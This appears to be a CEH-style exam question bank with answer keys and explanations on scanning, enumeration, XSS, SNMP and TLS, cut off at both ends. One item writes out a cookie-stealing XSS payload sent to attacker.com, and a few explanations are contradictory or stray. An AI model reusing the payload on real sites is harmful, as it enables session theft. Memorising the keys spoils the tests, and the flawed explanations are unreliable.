The Repeater tool in Burp Suite is specifically designed for manually modifying and reissuing individual HTTP requests. It allows security testers to fine-tune request parameters, headers, or body content and observe the server's response in real-time. This iterative process is crucial for exploring application logic, testing for specific vulnerabilities, or confirming exploit conditions step-by-step.
Why this answer
Burp Repeater is designed for manually crafting and resending requests to see individual responses, ideal for testing parameter handling.
A cloud security engineer discovers that an S3 bucket named 'acme-backups' is accessible to anyone with the bucket URL. The bucket contains sensitive customer data. Which AWS shared responsibility model component does this misconfiguration primarily violate?
A.AWS is responsible for physical security of data centers
B.The customer is responsible for patching the S3 service
C.The customer is responsible for configuring access controls and permissions
D.AWS is responsible for network infrastructure; the customer for data classification
AnswerC
This statement is correct because, within the AWS shared responsibility model, the customer is solely responsible for the "security in the cloud." For S3, this explicitly includes defining and implementing appropriate access controls and permissions. This involves configuring S3 bucket policies, Access Control Lists (ACLs), and AWS Identity and Access Management (IAM) policies to restrict who can access, modify, or delete data within their S3 buckets. A misconfiguration in these controls directly leads to data exposure.
Why this answer
Under the AWS shared responsibility model, the customer is responsible for configuring S3 bucket policies and access controls. The misconfiguration is a customer-side issue, not an infrastructure vulnerability.
During a penetration test, a tester observes that a web application's login form does not implement rate limiting and returns different error messages for valid vs invalid usernames. Which THREE attacks are most likely to be successful? (Select three)
Select 3 answers
A.Directory traversal
B.Credential stuffing
C.Brute-force attack
D.SQL injection
E.Password spraying
AnswersB, C, E
Credential stuffing is a highly effective attack where threat actors automate login attempts using large lists of username and password pairs previously compromised in data breaches from other services. If the web application allows valid usernames to be tested against these breached password lists without adequate detection or rate limiting, it becomes vulnerable to users who reuse their credentials across multiple platforms. This leverages the common user habit of password reuse.
Why this answer
With username enumeration and no rate limiting, brute force (trying many passwords on one user), credential stuffing (using breached credentials), and password spraying (trying common passwords across many users) are all viable. SQL injection is not directly related to the described conditions.
Which tool is commonly used to perform DNS spoofing on a local network by intercepting DNS requests and replying with forged responses?
A.Ettercap
B.Wireshark
C.Nmap
D.tcpdump
AnswerA
Ettercap performs ARP poisoning to place itself between hosts and the DNS server, then intercepts DNS queries and returns forged replies, satisfying the local-network DNS spoofing requirement. Its integrated sniffing and filtering plugins make this man-in-the-middle attack practical without additional tooling.
Why this answer
Ettercap is a comprehensive suite for man-in-the-middle attacks on a local network. It can perform DNS spoofing by intercepting DNS requests (typically over UDP port 53) and replying with forged responses before the legitimate DNS server can respond, redirecting victims to malicious IP addresses.
Exam trap
EC-Council often tests the distinction between passive monitoring tools (Wireshark, tcpdump) and active attack tools (Ettercap), leading candidates to confuse packet capture capabilities with the ability to inject forged traffic.
How to eliminate wrong answers
Option B (Wireshark) is wrong because it is a network protocol analyzer used for capturing and inspecting packets, not for injecting or modifying traffic to perform DNS spoofing. Option C (Nmap) is wrong because it is a network discovery and security scanning tool used for port scanning and service enumeration, not for intercepting and forging DNS responses. Option D (tcpdump) is wrong because it is a command-line packet capture utility used for network traffic analysis, lacking the capability to actively manipulate or spoof DNS replies.
An attacker uses `nmap -sI 10.0.0.5 192.168.1.10` to scan a target. This technique is known as an idle scan. Which condition is REQUIRED for this scan to work correctly?
A.The zombie host must be running a Windows operating system
B.The attacker must have root access on the target machine
C.The zombie host must have an incremental IP ID sequence that is not reset by other traffic
D.The target must be running a Linux server with SSH enabled
AnswerC
The Nmap idle scan fundamentally relies on the zombie host's IP ID sequence incrementing predictably for each outgoing packet. If the zombie's IP ID sequence is not strictly incremental or is reset by unrelated network traffic, the attacker cannot reliably infer the target port's status. This predictability is crucial because the scan deduces open/closed ports based on whether the zombie's IP ID increments by one (indicating no RST from target) or by two (indicating a RST from target, causing the zombie to send a RST back).
Why this answer
The idle scan (nmap -sI) relies on the zombie host's IP ID sequence being predictable and incremental. The attacker probes the zombie's IP ID, sends a spoofed SYN packet to the target (appearing from the zombie), and then re-checks the zombie's IP ID. If the IP ID has increased by exactly 2 (or more if other traffic occurred), the target responded to the zombie, confirming the port is open.
The zombie must not reset or randomize its IP ID, and other traffic to the zombie must be minimal or accounted for, making an incremental IP ID sequence the essential condition.
Exam trap
EC-Council often tests the misconception that the zombie must be idle or that the target must have a specific service, but the core requirement is the zombie's IP ID sequence being incremental and not reset by other traffic.
How to eliminate wrong answers
Option A is wrong because the idle scan does not require any specific operating system on the zombie; it works with any host that uses an incremental IP ID sequence (e.g., many legacy Windows, Linux, or BSD systems). Option B is wrong because the attacker does not need root access on the target machine; the scan is performed externally, and root access is only needed on the attacker's machine to send raw packets (e.g., via libpcap). Option D is wrong because the target's operating system or SSH service is irrelevant; the idle scan works against any TCP port on any target, regardless of OS or running services.
After a security incident, logs show repeated login attempts from different IP addresses using a list of common passwords against a single username. Which attack technique is being used?
A.Credential stuffing
B.Brute force attack
C.Password spraying
D.Dictionary attack
AnswerC
Password spraying is a sophisticated attack technique where a small number of very common passwords are systematically tried against a *large number of different user accounts* or a single account from *many different IP addresses*. This method is specifically designed to evade account lockout thresholds by distributing attempts across many targets or sources, preventing any single account or IP from exceeding the lockout limit. The 'repeated login attempts' observed in logs align perfectly with this strategy, as attackers aim to find weak passwords without triggering immediate detection.
Why this answer
Password spraying uses a small set of common passwords against many accounts or, as in this case, against a single account from multiple IPs to avoid lockout.
Refer to the exhibit. During a wireless audit, you capture a beacon frame from a corporate access point. What is the most significant security concern based on this information?
A.The pairwise cipher is CCMP, which is outdated.
B.The network uses WPA2-PSK, which is easily cracked.
C.The beacon frame reveals the BSSID, which is a security risk.
D.The group cipher is TKIP, which is deprecated and vulnerable.
AnswerD
The presence of TKIP (Temporal Key Integrity Protocol) as the group cipher is indeed a significant security vulnerability. TKIP was designed as a transitional solution for WPA to bridge the gap from WEP, but it incorporates known weaknesses, including a flawed Message Integrity Code (MIC) and vulnerabilities in its key mixing function. Consequently, it has been deprecated by the IEEE 802.11i standard and should not be used in secure wireless networks.
Why this answer
TKIP (Temporal Key Integrity Protocol) is a deprecated encryption protocol that was part of the original WPA standard. It is vulnerable to several attacks, including the Michael attack and the Beck-Tews attack, which can allow an attacker to decrypt traffic or inject packets. In a modern WPA2 network, TKIP should never be used as the group cipher; only CCMP (AES) is considered secure.
Exam trap
The trap here is that candidates often assume WPA2-PSK is inherently insecure (Option B) or that revealing the BSSID is a risk (Option C), but the real security flaw in this scenario is the use of TKIP as the group cipher, which is deprecated and known to be broken.
How to eliminate wrong answers
Option A is wrong because CCMP (Counter Mode Cipher Block Chaining Message Authentication Code Protocol) is the most secure cipher available for WPA2, based on AES, and is not outdated. Option B is wrong because while WPA2-PSK can be cracked if a weak passphrase is used, the protocol itself is not 'easily cracked' — the vulnerability lies in the passphrase strength, not the protocol. Option C is wrong because the BSSID (Basic Service Set Identifier) is the MAC address of the access point and is always transmitted in beacon frames; revealing it is not a security risk as it is necessary for client devices to identify and connect to the network.
During an authorized external assessment, a tester wants to determine which mail exchangers and third-party SaaS providers a target uses without alerting the target's security team. The tester already knows the primary domain. Which single command best reveals the target's MX records using a public resolver while sending no traffic to the target itself?
A.dig target.com ANY @target.com
B.host -t MX target.com 10.0.0.53
C.dig @8.8.8.8 target.com MX +noall +answer
D.nslookup -type=MX target.com ns1.target.com
AnswerC
This command queries Google's public resolver at 8.8.8.8 for the domain's MX records and displays only the answer section. The DNS request goes to the resolver, not to any hospital-controlled server, so it remains passive relative to the target. The MX records then reveal mail providers and sometimes SaaS tenants, exactly the intelligence required.
Why this answer
Directing a DNS query to a public resolver such as 8.8.8.8 keeps the request off the target's systems while still returning the MX records needed to identify mail and SaaS providers. The +noall +answer flags trim the output to just the relevant records, making the result easy to parse, and the technique leaves no footprint on target-owned name servers.
Exam trap
The trap here is thinking that any DNS query is passive, when choosing the target's own name server as the resolver still sends traffic to infrastructure the target controls and can monitor.
A security analyst notices that after submitting a form on a web application, the URL changes to include the user's ID parameter, e.g., 'user?id=123'. The analyst modifies the ID in the URL and accesses another user's profile without authorization. Which type of vulnerability is being exploited?
A.Reflected Cross-Site Scripting (XSS)
B.Command Injection
C.Cross-Site Request Forgery (CSRF)
D.Insecure Direct Object Reference (IDOR)
AnswerD
Insecure Direct Object Reference (IDOR) occurs when an application exposes a direct reference to an internal implementation object, such as a file, database key, or directory, and fails to implement proper authorization checks. An attacker can manipulate these references, often found in URL parameters, form fields, or API requests, to access or modify resources belonging to other users or unauthorized data. This vulnerability directly exploits the application's trust in user-supplied object identifiers without verifying the user's permission to access that specific object, leading to unauthorized information disclosure or modification.
Why this answer
The vulnerability is Insecure Direct Object Reference (IDOR), which occurs when an application exposes a direct reference to an internal object, such as a user ID in a URL, without verifying that the requester is authorized to access that object. By changing 'id=123' to another value, the analyst accesses another user's profile because the application trusts the client-supplied identifier. This is a classic access control flaw, not an injection or scripting issue.
Exam trap
CEH often tests whether candidates can distinguish IDOR (manipulating an object reference to bypass authorization) from XSS, CSRF, and command injection, which involve scripting, request forgery, or command execution respectively.
How to eliminate wrong answers
Option A is wrong because reflected XSS involves injecting script that executes in the victim's browser, not manipulating an object reference to access another user's data. Option B is wrong because command injection involves injecting OS commands through unsanitized input to execute on the server, which is not what changing an ID parameter does. Option C is wrong because CSRF tricks an authenticated user's browser into sending an unwanted request; here the analyst is directly modifying a parameter, not forging a request via another user's session.
A security analyst runs the command: nbtstat -A 192.168.1.10. The output shows the table of names for the remote machine. Which of the following is the MOST likely purpose of this command?
A.To perform a DNS zone transfer
B.To enumerate SNMP community strings on the remote host
C.To enumerate NetBIOS names and services on the remote host
D.To enumerate SMB shares on the remote host
AnswerC
The command `nbtstat -a 192.168.1.10` (or `-A` for adapter status) is precisely used to query the NetBIOS name table of a remote host. This query retrieves a list of NetBIOS names registered by the target machine, including the computer name, workgroup/domain name, and services like the Messenger service or File and Print Sharing, along with their associated types and status. This provides valuable information about the remote system's identity and active NetBIOS services.
Why this answer
The `nbtstat -A` command performs a NetBIOS name table lookup against a remote IP address, displaying the registered NetBIOS names and their associated service types (e.g., workstation, server, messenger). This is a core technique for NetBIOS enumeration, which reveals the remote host's computer name, logged-in user, and running NetBIOS services, making option C correct.
Exam trap
The trap here is that candidates confuse `nbtstat -A` (NetBIOS name table enumeration) with SMB share enumeration (`net view` or `smbclient`), because both are associated with Windows file sharing, but they operate at different protocol layers and serve distinct enumeration purposes.
How to eliminate wrong answers
Option A is wrong because DNS zone transfers are performed using `nslookup` or `dig` with specific zone transfer flags, not `nbtstat` which operates at the NetBIOS over TCP/IP layer. Option B is wrong because SNMP community string enumeration is done via tools like `snmpwalk` or `snmpenum` targeting UDP port 161, while `nbtstat` uses NetBIOS name service on UDP port 137. Option D is wrong because enumerating SMB shares is typically accomplished with `net view`, `smbclient`, or `enum4linux`, not `nbtstat` which only retrieves NetBIOS name tables, not share lists.
During a vulnerability scan with Nessus, you find that port 445/TCP is open on a Windows server. Which of the following is the MOST likely associated risk?
A.SNMP community string brute-forcing
B.Remote code execution via SMB vulnerabilities
C.HTTP directory traversal
D.DNS cache poisoning
AnswerB
Remote code execution (RCE) via SMB vulnerabilities is a highly relevant threat when TCP port 445 is found open, as this port is the standard for Server Message Block (SMB) communication. SMB implementations, particularly older versions or unpatched systems, have been historically plagued by critical RCE vulnerabilities, such as EternalBlue. A Nessus scan detecting an open port 445 would prompt an ethical hacker to investigate for specific SMB vulnerabilities that could allow an attacker to execute arbitrary code on the target system.
Why this answer
Port 445/TCP is used by Microsoft SMB (Server Message Block) over a direct TCP connection, commonly known as SMB over TCP. SMB has historically been plagued by critical remote code execution vulnerabilities, most notably EternalBlue (MS17-010) exploited by WannaCry. Therefore, an open SMB port on a Windows server presents a high risk of remote code execution if unpatched.
Exam trap
The trap here is that candidates may associate port 445 with file sharing only and overlook its history of critical remote code execution vulnerabilities, instead choosing a more generic or unrelated attack vector like HTTP directory traversal.
How to eliminate wrong answers
Option A is wrong because SNMP community string brute-forcing targets UDP ports 161/162, not TCP port 445. Option C is wrong because HTTP directory traversal exploits web servers on ports 80/443/TCP, not the SMB port. Option D is wrong because DNS cache poisoning attacks target DNS servers on UDP/TCP port 53, not port 445.
A security analyst reviews the following command output from a Linux system: `uid=0(root) gid=0(root) groups=0(root)`. The analyst suspects a privilege escalation attack. Which of the following techniques could have been used to achieve root access from a standard user account?
A.Token impersonation
B.Pass-the-hash attack
C.LLMNR/NBT-NS poisoning
D.SUID/GUID abuse
AnswerD
SUID (Set User ID) and SGID (Set Group ID) are special permissions in Linux that allow an executable file to run with the permissions of its owner (SUID) or group (SGID), rather than the user executing it. If a program owned by root has the SUID bit set, any user executing it will temporarily gain root privileges for the duration of that program's execution. Attackers can exploit misconfigured or vulnerable SUID/SGID binaries, such as those that allow arbitrary command execution or shell escapes, to elevate their privileges to root or another privileged user.
Why this answer
The command output shows the current user has UID 0, which is the root user. On Linux, SUID (Set User ID) and GUID (Group ID) bits allow executables to run with the permissions of the file owner (e.g., root). A standard user can exploit a misconfigured SUID binary (like `passwd` or a custom script) to execute commands with root privileges, achieving privilege escalation.
This is a classic Linux privilege escalation technique directly tied to the UID/GID output shown.
Exam trap
The trap here is that candidates confuse Windows-specific attacks (token impersonation, pass-the-hash, LLMNR poisoning) with Linux privilege escalation, failing to recognize that the `uid=0` output is a direct indicator of root access achieved via SUID/GUID abuse.
How to eliminate wrong answers
Option A is wrong because token impersonation is a Windows-specific attack that involves duplicating access tokens (e.g., via SeImpersonatePrivilege) and does not apply to Linux systems. Option B is wrong because pass-the-hash is a Windows network authentication attack that reuses NTLM hashes to authenticate without knowing the plaintext password; it is not relevant to Linux local privilege escalation. Option C is wrong because LLMNR/NBT-NS poisoning is a Windows network protocol attack used to intercept authentication requests on a local network, not a technique to escalate privileges on a local Linux system.
A security analyst observes that a web application allows users to submit feedback, and after submission, the feedback is displayed on a public page. An attacker submits feedback containing the script: <script>document.location='http://attacker.com/?c='+document.cookie</script>. When an admin views the public page, the script executes. Which type of attack occurred?
A.Reflected XSS
B.Cross-site request forgery (CSRF)
C.DOM-based XSS
D.Stored XSS
AnswerD
Stored XSS, also known as persistent XSS, occurs when a malicious script is permanently saved on the target server, typically within a database, comment section, or user profile. When a victim's browser requests the page containing this stored payload, the server retrieves the malicious script and delivers it as part of the legitimate web page content. Consequently, the victim's browser executes the script, allowing the attacker to steal cookies, deface the website, or redirect users, making it a highly impactful and widespread attack.
Why this answer
The script is stored on the server (feedback) and executed when the admin views the page. This is persistent (stored) XSS.
Which of the following is a primary purpose of the enumeration phase in a penetration test?
A.To gather in-depth information about the target system and its resources
B.To exploit identified vulnerabilities and gain access
C.To perform a vulnerability scan on the target network
D.To delete logs and cover tracks after a successful compromise
AnswerA
Enumeration is the active process of extracting detailed information from a target system or network, such as user accounts, group memberships, network shares, running services, and open ports. This granular data provides critical intelligence to identify potential attack vectors and misconfigurations, laying the groundwork for subsequent vulnerability analysis and exploitation attempts. It moves beyond simple port scanning to actively query services for specific configuration details.
Why this answer
The enumeration phase is the active process of extracting detailed information about a target system, such as user accounts, network shares, services, and system policies, using direct queries. This phase goes beyond passive reconnaissance by establishing connections to the target to gather data that can be used to identify attack vectors. In a CEH context, enumeration is specifically defined as the step where the tester collects in-depth information about the target's resources and potential entry points.
Exam trap
The trap here is that candidates often confuse enumeration with vulnerability scanning, but enumeration focuses on gathering system-specific information (like user accounts and shares) rather than scanning for known vulnerabilities.
How to eliminate wrong answers
Option B is wrong because exploiting vulnerabilities and gaining access is the purpose of the exploitation phase, not enumeration. Option C is wrong because performing a vulnerability scan is part of the vulnerability assessment phase, which typically occurs after enumeration and before exploitation. Option D is wrong because deleting logs and covering tracks is an activity of the post-exploitation or covering tracks phase, which occurs after a successful compromise, not during enumeration.
Refer to the exhibit. An attacker runs the nslookup command shown. What information has been gathered?
A.Mail server addresses and priority
B.Name server records
C.IP addresses of the web server
D.SPF records for email authentication
AnswerA
When an attacker runs `nslookup` without specifying a query type, the command often defaults to querying A records but will frequently display Mail Exchanger (MX) records if they are configured for the domain, as these are critical for email routing. MX records explicitly list the mail servers responsible for accepting email on behalf of a domain and assign a numerical preference value, indicating the priority for delivery. This allows email clients to attempt delivery to the lowest-preference server first, ensuring redundancy and load balancing.
Why this answer
The nslookup command with the -type=MX query returns mail exchange (MX) records for the domain. The output shows mail server hostnames and their associated priority values (e.g., 10, 20), which indicate the order in which mail servers should be used. This directly reveals the mail server addresses and their priority, making option A correct.
Exam trap
The trap here is that candidates confuse DNS record types—specifically, they may think MX records return IP addresses or SPF data, when in fact MX only returns mail server hostnames and priorities.
How to eliminate wrong answers
Option B is wrong because name server (NS) records are retrieved using -type=NS, not -type=MX; the output shows no NS records. Option C is wrong because IP addresses of the web server are obtained via A or AAAA records, not MX records; MX records only provide mail server hostnames, not web server IPs. Option D is wrong because SPF records are stored as TXT records, not MX records; the -type=MX query does not return SPF data.
A security engineer observes the following log event: 'Certificate for www.example.com was issued by an intermediate CA that chains to a root CA not in the trusted store.' Which type of attack might this indicate?
A.Birthday attack on the certificate signature
B.Downgrade attack to SSLv3
C.Man-in-the-middle using a rogue certificate
D.Replay attack on the TLS handshake
AnswerC
When a client encounters an "untrusted root CA" error, it signifies that the digital certificate presented by the server cannot be validated against the client's pre-installed list of trusted Certificate Authorities. In a Man-in-the-Middle (MitM) attack, an adversary intercepts communication and presents a fraudulent certificate, often self-signed or issued by an attacker-controlled CA, to the client. This rogue certificate will naturally fail the trust chain validation, leading to the observed error as the client cannot establish a secure, authenticated connection to the legitimate server.
Why this answer
A certificate issued by an intermediate CA chaining to an untrusted root is the classic signature of a rogue or self-signed CA used in a man-in-the-middle attack. The attacker presents a certificate for www.example.com signed by their own CA; because the root is not in the client's trust store, the chain fails validation, but the log event reveals the attempt. This is exactly how TLS interception proxies and malicious MITM setups appear in logs.
Exam trap
The trap is over-reading the log — candidates pick exotic attacks like birthday or downgrade, but the specific clue 'untrusted root CA' points directly to a rogue-certificate MITM.
How to eliminate wrong answers
Option A is wrong because a birthday attack targets hash collisions to forge signatures; it would not produce a valid-looking chain to an untrusted root. Option B is wrong because a downgrade attack forces a weaker protocol version (SSLv3), which would appear as a protocol negotiation anomaly, not a certificate chain issue. Option D is wrong because a replay attack reuses captured handshake or session data; it does not involve issuing a new certificate with an untrusted root.
A penetration tester is analyzing a captured TLS 1.3 handshake between a client and a server. The tester notices that the server's certificate is signed with RSA-PSS and the key exchange uses X25519. Which of the following statements is TRUE regarding the security of this handshake?
A.The handshake provides forward secrecy because X25519 is used for key exchange.
B.The handshake is susceptible to a Bleichenbacher attack due to RSA-PSS padding.
C.The handshake does not provide authentication because X25519 is used for key exchange.
D.The handshake is vulnerable to a downgrade attack because TLS 1.3 does not support RSA-PSS.
AnswerA
X25519 is an ephemeral Diffie-Hellman key exchange, which provides forward secrecy. In TLS 1.3, forward secrecy is mandatory for all cipher suites. The use of X25519 ensures that session keys are not compromised even if the server's long-term private key is later compromised, making this statement true.
Why this answer
X25519 is an ephemeral elliptic-curve Diffie-Hellman function that provides forward secrecy. In TLS 1.3, forward secrecy is mandatory, and the use of X25519 ensures that session keys are unique and not derivable from the server's long-term private key. The other statements are incorrect because TLS 1.3 supports RSA-PSS, mitigates Bleichenbacher attacks, and separates authentication from key exchange.
Exam trap
The trap here is assuming that RSA-PSS is vulnerable to Bleichenbacher attacks, which actually target PKCS#1 v1.5 padding, or confusing key exchange with authentication.
A penetration tester is performing SNMP enumeration against a network device and wants to retrieve the entire Management Information Base (MIB) tree. Which command should they use?
A.snmpwalk -v 2c -c public 192.168.1.1 .1
B.snmpset -v 2c -c private 192.168.1.1 1.3.6.1.2.1.1.0 s 'test'
C.snmpbulkwalk -v 2c -c public 192.168.1.1 .1
D.snmpget -v 2c -c public 192.168.1.1 1.3.6.1.2.1.1
AnswerA
This command correctly utilizes `snmpwalk` to perform comprehensive SNMP enumeration. The `-v 2c` flag specifies the use of SNMPv2c, a widely adopted version, and `-c public` employs the common default read-only community string. Crucially, initiating the walk with `.1` as the starting Object Identifier (OID) instructs `snmpwalk` to traverse and retrieve all available information from the entire Management Information Base (MIB) tree on the target device, which is the precise objective of thorough SNMP enumeration.
Why this answer
`snmpwalk` is specifically designed to retrieve a subtree of MIB objects by performing a series of GETNEXT requests starting from a given OID. Using `.1` as the root OID (which corresponds to the entire ISO tree) with the SNMPv2c community string 'public' will enumerate all accessible OIDs in the MIB tree, effectively dumping the entire Management Information Base.
Exam trap
The trap here is that candidates often confuse `snmpbulkwalk` as the correct answer because it is faster for large MIBs, but the CEH exam expects `snmpwalk` as the standard enumeration tool, and `snmpbulkwalk` may not be supported by all SNMP agents.
How to eliminate wrong answers
Option B is wrong because `snmpset` is used to modify SNMP objects, not to retrieve them; it requires write access (community 'private') and would fail to enumerate the MIB tree. Option C is wrong because `snmpbulkwalk` is optimized for bulk retrieval but is not the standard command for a full MIB tree walk; it uses GETBULK requests which may be blocked or behave differently on some devices, and the question asks for the command to use, not the most efficient one. Option D is wrong because `snmpget` retrieves only a single OID value (1.3.6.1.2.1.1) and does not walk the tree; it would return only the system description or a single scalar object, not the entire MIB.
Which TWO of the following are characteristics of a reflected Cross-Site Scripting (XSS) attack? (Select 2)
Select 2 answers
A.The attack is typically delivered through a crafted link
B.The script executes in the server-side context
C.The attack affects all users who visit the compromised page without any interaction
D.The malicious script is reflected off the web server in the response
E.The malicious script is permanently stored on the server
AnswersA, D
Reflected Cross-Site Scripting (XSS) attacks are typically initiated when an attacker crafts a malicious URL containing the injected script and then tricks a victim into clicking it. This delivery mechanism is crucial because the malicious payload is not persistently stored on the server. Instead, the victim's browser sends the crafted URL to the vulnerable web application, which then reflects the script back in the immediate HTTP response, executing it in the victim's browser context.
Why this answer
Reflected XSS requires user interaction (clicking a link) and does not persist on the server.
An analyst reviews a web server log and sees the following request: GET /search?q=<script>alert('xss')</script> HTTP/1.1. The response from the server includes the search term inside a <div> tag without any sanitization. Which type of XSS vulnerability does this indicate?
A.Stored XSS
B.Reflected XSS
C.DOM-based XSS
D.Blind XSS
AnswerB
Reflected Cross-Site Scripting (XSS) occurs when a malicious script, typically injected through a URL parameter or form input, is immediately processed by the server and returned within the HTTP response to the user's browser without proper sanitization. The script is not stored on the server; instead, it "reflects" off the server back to the user who made the request. The web server log showing the script directly in the request and implying an immediate response aligns perfectly with this non-persistent, server-side reflection mechanism.
Why this answer
The payload appears in the URL query string and is immediately echoed back in the response inside a <div> without sanitization. This is the classic signature of reflected XSS: the malicious script is not stored on the server but is reflected from the request to the response, executing in the victim's browser when they click a crafted link. The single request/response cycle in the log confirms it is not stored.
Exam trap
The trap is distinguishing reflected from DOM-based XSS — candidates see a script in a URL and assume DOM-based, but the presence of the payload in the server's HTTP response confirms reflected XSS.
How to eliminate wrong answers
Option A is wrong because stored XSS requires the payload to be persisted (e.g., in a database or comment field) and served to later visitors — here the script comes from the query string, not storage. Option C is wrong because DOM-based XSS occurs entirely client-side when JavaScript reads a source (like location.hash) and writes it to a sink (like innerHTML) without server involvement; this log shows the server reflecting the payload in HTML, so it is server-side reflected XSS. Option D is wrong because blind XSS is a stored variant where the payload executes in a different context (e.g., an admin panel) that the attacker cannot see; there is no evidence of deferred execution here.
An attacker uses the Social Engineering Toolkit (SET) to clone a legitimate website and send a malicious link to employees. When an employee clicks the link, they are prompted to enter their credentials. Which attack is this?
A.SMiShing
B.Spear phishing
C.Vishing
D.Phishing
AnswerD
Cloning a legitimate site and harvesting credentials via a sent link is credential phishing. The Social Engineering Toolkit automates the fake login page, but the attack category remains phishing, defined by deceptive messaging that induces victims to surrender sensitive information.
Why this answer
The Social Engineering Toolkit (SET) is used to clone a legitimate website and capture credentials via a malicious link. This is a classic phishing attack because it involves sending a fraudulent communication (the link) that mimics a trusted entity to trick victims into revealing sensitive information. The attack does not rely on SMS (SMiShing), voice calls (Vishing), or targeted personalization (Spear phishing) beyond the generic employee group.
Exam trap
The CEH exam often tests the distinction between generic phishing and spear phishing, where the trap is assuming any targeted employee list automatically qualifies as spear phishing, even without personalized content.
How to eliminate wrong answers
Option A is wrong because SMiShing (SMS phishing) uses text messages as the delivery vector, not a cloned website link sent via email or other channels. Option B is wrong because spear phishing involves highly targeted, personalized messages to specific individuals or roles, whereas this scenario describes a generic link sent to employees without customization. Option C is wrong because vishing (voice phishing) uses phone calls or voice messages to trick victims, not a cloned website link.
During a security assessment, an analyst runs 'enum4linux -a 10.0.0.5' and obtains a list of users, shares, and OS information. What protocol is enum4linux primarily using to gather this information?
A.NetBIOS
B.SNMP
C.LDAP
D.SMB/CIFS
AnswerD
Enum4linux is a powerful enumeration tool specifically designed to interact with the Server Message Block (SMB) and Common Internet File System (CIFS) protocols. It leverages various SMB functionalities, such as querying NetBIOS name services, enumerating shares, listing users, and extracting operating system information from Windows and Samba hosts. This direct interaction with SMB/CIFS allows it to gather critical reconnaissance data for security assessments.
Why this answer
enum4linux is a wrapper around tools from the Samba suite, primarily using the SMB/CIFS protocol to query Windows systems for information such as user lists, shares, and OS details. It leverages SMB's remote IPC mechanisms (e.g., via \pipe\lsarpc or \pipe\samr) to enumerate these data points, making D the correct answer.
Exam trap
The trap here is that candidates confuse the underlying protocol (SMB/CIFS) with the transport or name-resolution layer (NetBIOS), leading them to select Option A because enum4linux historically used NetBIOS name lookups, but the core enumeration protocol is SMB/CIFS.
How to eliminate wrong answers
Option A is wrong because NetBIOS is a session-layer protocol used for name resolution and service discovery, but enum4linux relies on SMB/CIFS over TCP/445 (or NetBIOS over TCP/139) to perform its enumeration; the tool itself is not primarily a NetBIOS scanner. Option B is wrong because SNMP (Simple Network Management Protocol) uses UDP ports 161/162 and is designed for managing network devices, not for enumerating Windows user accounts or shares via SMB. Option C is wrong because LDAP (Lightweight Directory Access Protocol) operates on TCP/389 and is used for querying directory services like Active Directory, but enum4linux does not use LDAP by default; it uses SMB RPC calls to extract information.
A penetration tester wants to identify live hosts on a large IP range without generating excessive network traffic. Which tool is BEST suited for fast host discovery?
A.Masscan
B.Maltego
C.dnsenum
D.Nessus
AnswerA
Masscan is specifically engineered for extremely high-speed network scanning, capable of scanning vast IP address spaces, including the entire internet, in minutes. It achieves this by employing an asynchronous, stateless approach to transmit SYN packets at a rapid rate, making it ideal for quickly identifying live hosts and open ports across large address ranges. Its primary strength lies in its ability to conduct broad reconnaissance efficiently, far surpassing other tools for sheer scanning velocity when the objective is rapid host discovery.
Why this answer
Masscan is the best tool for fast host discovery across large IP ranges because it uses asynchronous transmission and can scan the entire IPv4 address space in under 10 minutes at a rate of 10 million packets per second. It minimizes network traffic by sending only SYN packets and not completing the TCP handshake, making it ideal for rapid live host detection without overwhelming the network.
Exam trap
The trap here is that candidates confuse 'host discovery' with 'vulnerability scanning' or 'OSINT gathering', leading them to choose Nessus or Maltego, but the question specifically asks for minimal traffic and speed, which only Masscan's asynchronous SYN scan achieves.
How to eliminate wrong answers
Option B is wrong because Maltego is a graphical link analysis tool for gathering and correlating open-source intelligence (OSINT), not a network scanner for live host discovery; it relies on existing data sources rather than sending packets. Option C is wrong because dnsenum is a DNS enumeration tool that queries DNS servers for subdomains and records, not a host discovery scanner; it does not send raw packets to probe IP addresses. Option D is wrong because Nessus is a comprehensive vulnerability scanner that performs deep, multi-packet scans with full handshakes and plugin checks, generating heavy traffic and taking much longer than needed for simple host discovery.
A company wants to protect its network from MAC flooding attacks. Which of the following countermeasures is MOST effective?
A.Use Wireshark to monitor for floods
B.Disable CAM table learning
C.Enable port security on switches
D.Implement ARP spoofing detection
AnswerC
Enabling port security on switches is the most effective defense against MAC flooding attacks. This feature allows administrators to configure a maximum number of MAC addresses permitted to be learned on a specific switch port. When the configured limit is exceeded, the switch can be configured to take action, such as shutting down the port, restricting further MAC address learning, or generating an alert, thereby preventing the attacker from overflowing the CAM table.
Why this answer
Enabling port security on switches directly limits the number of MAC addresses that can be learned on a switch port, preventing an attacker from flooding the CAM table with fake MAC addresses. When the configured limit is exceeded, the switch can either drop traffic, shut down the port, or send an alert, effectively stopping the MAC flooding attack at the access layer.
Exam trap
The CEH exam often tests the distinction between passive monitoring tools (like Wireshark) and active security controls (like port security), and the trap here is that candidates confuse detection with prevention, or confuse MAC flooding with ARP spoofing attacks.
How to eliminate wrong answers
Option A is wrong because Wireshark is a passive packet analyzer that can detect a MAC flooding attack in progress but cannot prevent or stop it; it provides no active countermeasure. Option B is wrong because disabling CAM table learning would break normal switch operation, as the switch would be unable to build its forwarding table and would flood all frames out all ports, effectively turning the switch into a hub and causing network disruption. Option D is wrong because ARP spoofing detection addresses ARP cache poisoning attacks, not MAC flooding attacks; MAC flooding targets the switch's CAM table by exhausting its memory with fake MAC addresses, while ARP spoofing manipulates IP-to-MAC mappings on hosts.
During a penetration test, an analyst runs the command 'snmpwalk -v2c -c public 192.168.1.10' and receives a large amount of output. Which protocol and community string are being used?
A.SNMPv1 with community string public
B.SNMPv1 with community string private
C.SNMPv2c with community string public
D.SNMPv3 with user public
AnswerC
This option is correct because the command's `-v2c` flag precisely identifies SNMP version 2c, which offers significant improvements over SNMPv1, including enhanced bulk data transfer and more detailed error messages. Concurrently, the `-c public` flag accurately specifies the community string as 'public', a widely known default often targeted by attackers for initial reconnaissance during penetration tests.
Why this answer
The command 'snmpwalk -v2c -c public 192.168.1.10' explicitly specifies SNMP version 2c with the '-v2c' flag and the community string 'public' with the '-c' flag. SNMPv2c is the most common version for read-only queries, and 'public' is the default read-only community string. The large output indicates successful enumeration of the MIB tree, confirming the community string is correct.
Exam trap
The trap here is that candidates often confuse the '-v2c' flag with SNMPv1 or assume 'public' is always read-only, but the question tests the direct mapping of command-line arguments to protocol version and community string.
How to eliminate wrong answers
